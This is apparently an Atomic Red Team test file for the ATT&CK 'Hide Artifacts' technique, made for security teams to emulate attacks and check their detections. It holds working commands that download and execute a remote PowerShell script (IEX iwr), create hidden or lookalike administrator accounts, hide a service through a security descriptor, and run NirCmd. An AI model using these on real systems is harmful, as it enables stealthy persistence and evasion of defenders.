attack_technique: T1564 display_name: "Hide Artifacts" atomic_tests: - name: Extract binary files via VBA auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a description: | This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored within the office document itself. An example of this technique can be seen in sample f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226 This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2 is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: | Microsoft Word must be installed prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null Stop-Process -Name "winword" exit 0 } catch { exit 1 } get_prereq_command: | Write-Host "You will need to install Microsoft Word manually to meet this requirement" executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: | Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 description: Creating a user with a username containing "$" supported_platforms: - windows executor: name: command_prompt elevation_required: true command: net user $ ATOMIC123! /add /active:yes cleanup_command: net user $ /DELETE 2>&1 - name: Create an "Administrator " user (with a space on the end) auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c description: Creating a user with a username containing with a space on the end supported_platforms: - windows executor: name: powershell elevation_required: true command: New-LocalUser -Name "Administrator " -NoPassword cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null - name: Create and Hide a Service with sc.exe auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a description: | The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query. Upon successful execution, sc.exe creates a new service changes the security descriptor. https://twitter.com/Alh4zr3d/status/1580925761996828672 https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format supported_platforms: - windows input_arguments: service_name: description: Name of service to create type: string default: AtomicService executable_command: description: Command to execute as a service type: string default: 'C:\Windows\System32\calc.exe' executor: command: | sc.exe create #{service_name} binPath= "#{executable_command}" sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" cleanup_command: | sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" sc.exe delete #{service_name} name: command_prompt elevation_required: true - name: Command Execution with NirCmd auto_generated_guid: 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be description: | NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis supported_platforms: - windows input_arguments: nircmd_location: description: Location of nircmd executable type: Path default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe command_to_execute: description: Command for nircmd to execute type: Path default: win child class "Shell_TrayWnd" hide class "TrayClockWClass" cleanup_command_to_execute: description: Cleanup command to undo the arbitrary command ran by nircmd type: Path default: win child class "Shell_TrayWnd" show class "TrayClockWClass" dependency_executor_name: powershell dependencies: - description: | The Nircmd executable must exist at (#{nircmd_location}) prereq_command: | if (Test-Path "#{nircmd_location}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null invoke-webrequest "https://www.nirsoft.net/utils/nircmd-x64.zip" -outfile "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" executor: command: | cmd /c "#{nircmd_location}" #{command_to_execute} cleanup_command: | cmd /c "#{nircmd_location}" #{cleanup_command_to_execute} -erroraction silentlycontinue | out-null name: powershell elevation_required: false